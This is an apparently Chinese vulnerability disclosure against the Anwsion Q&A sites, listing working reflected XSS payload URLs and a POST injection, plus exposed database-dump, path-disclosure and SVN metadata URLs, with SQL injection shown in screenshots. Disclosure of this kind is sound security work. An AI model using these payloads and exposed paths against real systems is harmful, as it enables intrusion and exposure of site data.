### 简要描述:
再忽略就泪奔了。
### 详细说明:
1.XSS
```
http://wenda.anwsion.com/home/explore/category-3%22%3E%3Ciframe%20src=//www.baidu.com%3E
http://wenda.anwsion.com/home/explore/page-5__sort_type-hot__category-3_%22%3E%3Ciframe%20onload=alert(/xss/)%3E-1
http://wenda.anwsion.com/search/q-MTwvdGl0bGU+MTxTY1JpUHQgPmFsZXJ0KC94c3MvKTwvU2NSaVB0Pg==#all
http://dev.anwsion.com/?q="><iframe onload=alert(/xss/)>
http://dev.anwsion.com/?act=login
POST:password=password&referer="><iframe onload=alert(1)>&username=hehe
```
2.数据库信息泄漏
http://dev.anwsion.com/sql/install/database.sql
3.路径泄漏
http://dev.anwsion.com/i/?act=getentry&page[]=1
4.SVN
http://static.anwsion.com/.svn/entries
http://static.anwsion.com/admin/.svn/entries
5.SQL注入(见图)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201210/16214329a82c2de5f0fa7fb98781a2eaf1c1c5b2.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214329a82c2de5f0fa7fb98781a2eaf1c1c5b2.jpg)
[<img src="https://images.seebug.org/upload/201210/1621431822d99cc088cff9e0762dc129933404ee.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/1621431822d99cc088cff9e0762dc129933404ee.jpg)
[<img src="https://images.seebug.org/upload/201210/16214311bf7e65fccc4940778b6b9a2a0e07f780.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214311bf7e65fccc4940778b6b9a2a0e07f780.jpg)
[<img src="https://images.seebug.org/upload/201210/16214306b4f81363c91aad8fd70bbe16cc3f8d8c.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214306b4f81363c91aad8fd70bbe16cc3f8d8c.jpg)
[<img src="https://images.seebug.org/upload/201210/16214301f3ebd6517484c4a726b585ecfc5d9501.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214301f3ebd6517484c4a726b585ecfc5d9501.jpg)
[<img src="https://images.seebug.org/upload/201210/162142569393761ba6178f7e733320f21b44dd75.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/162142569393761ba6178f7e733320f21b44dd75.jpg)
[<img src="https://images.seebug.org/upload/201210/16214251133650f2f90fb1140449da4dcc9a4b1b.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214251133650f2f90fb1140449da4dcc9a4b1b.jpg)
[<img src="https://images.seebug.org/upload/201210/162142409b6016f6e84fc9de2ead295e61f82316.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/162142409b6016f6e84fc9de2ead295e61f82316.jpg)
京公网安备 11010502034610号
暂无评论